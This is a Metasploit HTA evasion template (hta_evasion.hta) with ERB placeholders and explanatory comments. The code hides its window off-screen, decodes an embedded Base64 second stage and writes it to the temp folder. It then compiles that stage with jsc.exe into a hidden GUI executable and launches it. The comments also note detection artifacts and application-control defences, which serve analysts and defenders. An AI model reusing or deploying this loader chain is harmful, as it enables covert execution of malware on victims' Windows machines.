Mirror of metasploit

hta_evasion.hta 3.8KB

  <!--
    HTML Application (HTA) wrapper. An .hta file is run by the HTA host
    (mshta.exe by default on Windows) rather than inside the browser sandbox,
    which is why the script below can create ActiveX objects.
    The HTA:APPLICATION attributes start the window minimized and suppress its
    taskbar button, system menu and caption bar.
    Note that the script element follows the closing html tag.
  -->
  <html>
  <head>
  <HTA:APPLICATION WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
  </head>
  </html>
  <script>
  // Shrink the window to 1x1 pixel and move it to negative screen coordinates,
  // so nothing is drawn in the visible desktop area. Combined with the
  // HTA:APPLICATION attributes above, the user sees no window at all.
  window.resizeTo(1, 1);
  window.moveTo(-2000, -2000);
  // Base64 implementation found on http://www.webtoolkit.info/javascript-base64.html
  // variable names changed to make obfuscation easier
  // NOTE(review): because of the remark above, identifiers and statement order
  // are left exactly as they are; a later obfuscation pass presumably depends
  // on them - confirm against the generator that consumes this template.
  //
  // Decode-only Base64 helper: decode() turns a Base64 string into bytes and
  // then passes them through _utf8_decode() to produce the final text.
  var Base64 = {
    // private property
    // Alphabet lookup table: indices 0-63 are the Base64 digits, index 64 is
    // the '=' padding character.
    _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
    // public method for decoding
    // input:   Base64 text; characters outside the allowed set are stripped.
    // returns: the decoded string after UTF-8 decoding.
    decode : function (input) {
      var output = "";
      var chr1, chr2, chr3;
      var enc1, enc2, enc3, enc4;
      var i = 0;
      // Strip anything that is not a Base64 character. The class as written
      // also lets a backslash through ("\\" inside the brackets); a backslash
      // is not in _keyStr, so indexOf() would return -1 for it below.
      input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
      // Consume four 6-bit symbols per iteration and repack them as three bytes.
      while (i < input.length) {
        enc1 = this._keyStr.indexOf(input.charAt(i++));
        enc2 = this._keyStr.indexOf(input.charAt(i++));
        enc3 = this._keyStr.indexOf(input.charAt(i++));
        enc4 = this._keyStr.indexOf(input.charAt(i++));
        chr1 = (enc1 << 2) | (enc2 >> 4);
        chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
        chr3 = ((enc3 & 3) << 6) | enc4;
        output = output + String.fromCharCode(chr1);
        // Index 64 is '=': a padded position carries no data byte.
        if (enc3 != 64) {
          output = output + String.fromCharCode(chr2);
        }
        if (enc4 != 64) {
          output = output + String.fromCharCode(chr3);
        }
      }
      // The raw bytes are interpreted as UTF-8 before being returned.
      output = Base64._utf8_decode(output);
      return output;
    },
    // Convert a string of byte values (one char code per byte) from UTF-8 into
    // a JavaScript string. Only 1-, 2- and 3-byte sequences are distinguished:
    // any lead byte that is neither < 128 nor in 192..223 takes the 3-byte
    // branch. No bounds or continuation-byte validation is performed.
    _utf8_decode : function (utftext) {
      var string = "";
      var input_idx = 0;
      var chr1 = 0;
      var chr2 = 0;
      var chr3 = 0;
      while ( input_idx < utftext.length ) {
        chr1 = utftext.charCodeAt(input_idx);
        if (chr1 < 128) {
          // Single-byte (ASCII) code point.
          string += String.fromCharCode(chr1);
          input_idx++;
        }
        else if((chr1 > 191) && (chr1 < 224)) {
          // Two-byte sequence: 5 bits from the lead byte, 6 from the next.
          chr2 = utftext.charCodeAt(input_idx+1);
          string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
          input_idx += 2;
        } else {
          // Everything else is treated as a three-byte sequence.
          chr2 = utftext.charCodeAt(input_idx+1);
          chr3 = utftext.charCodeAt(input_idx+2);
          string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
          input_idx += 3;
        }
      }
      return string;
    }
  };
  // Decode the Base64 blob that the ERB placeholder jsnet_encoded is replaced
  // with when the template is rendered. The assignment has no `var`, so
  // decodedStr becomes an implicit global; makefile() later writes it to disk.
  // For analysts: the second stage therefore sits inside the .hta itself as
  // the string argument of this call and can be recovered by decoding it
  // offline, without running the file.
  decodedStr = Base64.decode("<%= jsnet_encoded %>");
  // Return the temporary folder as reported by Scripting.FileSystemObject.
  // GetSpecialFolder(2) is the FSO constant for the temp folder (0 = Windows,
  // 1 = System, 2 = Temporary). The value returned is whatever the FSO call
  // yields; the callers concatenate it with strings to build file paths.
  function getTempPath()
  {
    var TemporaryFolder = 2;
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var tempPath = fso.GetSpecialFolder(TemporaryFolder);
    return tempPath;
  }
  // Resolve the temp folder once; makefile() and the final stage both build
  // their file names from this global.
  var path = getTempPath();
  // Write the decoded text (global decodedStr) to "<fname>.js" in the temp
  // folder (global path). fname is an ERB placeholder filled in at render time.
  // CreateTextFile's second argument (true) overwrites an existing file.
  // WriteLine appends a line terminator after the content.
  // NOTE(review): the quadrupled backslashes evaluate to two separator
  // characters at runtime if the template is emitted verbatim; presumably an
  // upstream escaping layer halves them - confirm.
  // Detection: a script file created in the user's temp folder by the HTA host
  // process is the first on-disk artifact of this template.
  function makefile()
  {
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var thefile = fso.CreateTextFile(path + "\\\\<%= fname %>.js", true);
    thefile.WriteLine(decodedStr);
    thefile.Close();
  }
  // Drop the decoded script to disk before looking for a compiler.
  makefile();
  // Locate jsc.exe (the JScript .NET command-line compiler) under the
  // hard-coded 32-bit .NET Framework directory.
  // Returns the full path of the first jsc.exe found in an immediate
  // subfolder, or false when the Framework folder is missing or no subfolder
  // contains jsc.exe. Only C:\Windows\Microsoft.NET\Framework is searched;
  // Framework64 and non-default Windows directories are not considered.
  // Subfolders are visited in whatever order the Enumerator yields them.
  function findJSC()
  {
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var comPath = "C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\";
    var jscPath = "";
    if(!fso.FolderExists(comPath))
    {
      return false;
    }
    var frameFolder = fso.GetFolder(comPath);
    // JScript Enumerator: the COM collection cannot be indexed directly.
    var fEnum = new Enumerator(frameFolder.SubFolders);
    while(!fEnum.atEnd())
    {
      jscPath = fEnum.item().Path;
      if(fso.FileExists(jscPath + "\\\\jsc.exe"))
      {
        return jscPath + "\\\\jsc.exe";
      }
      fEnum.moveNext();
    }
    return false;
  }
  // Final stage: if a compiler was found, compile the dropped .js into an
  // .exe in the temp folder and start it. If findJSC() returned false, nothing
  // further happens (the .js file written earlier is left in place).
  //
  // Observable sequence for defenders, all of it visible in process-creation
  // and file-creation telemetry:
  //   1. the HTA host process spawns jsc.exe with /out: pointing into the
  //      temp folder and /t:winexe (GUI executable, no console window);
  //   2. a new .exe appears next to the .js file;
  //   3. the same HTA host process then spawns that .exe.
  // Application-control policies that deny mshta.exe or jsc.exe to ordinary
  // users break this chain at step 0 or step 1.
  var comPath = findJSC();
  if(comPath)
  {
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var objShell = new ActiveXObject("WScript.shell");
    var js_f = path + "\\\\<%= fname %>.js";
    var ex = path + "\\\\<%= fname %>.exe";
    // arch is an ERB placeholder; it becomes the jsc /platform: value.
    var platform = "/platform:<%= arch %>";
    // Window style 0 = hidden. The wait-on-return argument is omitted, so
    // run() returns immediately while the compiler is still working.
    objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0);
    // Busy-wait until the output file exists. There is no sleep and no
    // timeout: if compilation fails, the HTA host spins on this loop
    // indefinitely, which shows up as sustained CPU use by that process.
    while(!fso.FileExists(ex)) { }
    // Launch the compiled executable, again with a hidden window.
    objShell.run(ex, 0);
  }
  </script>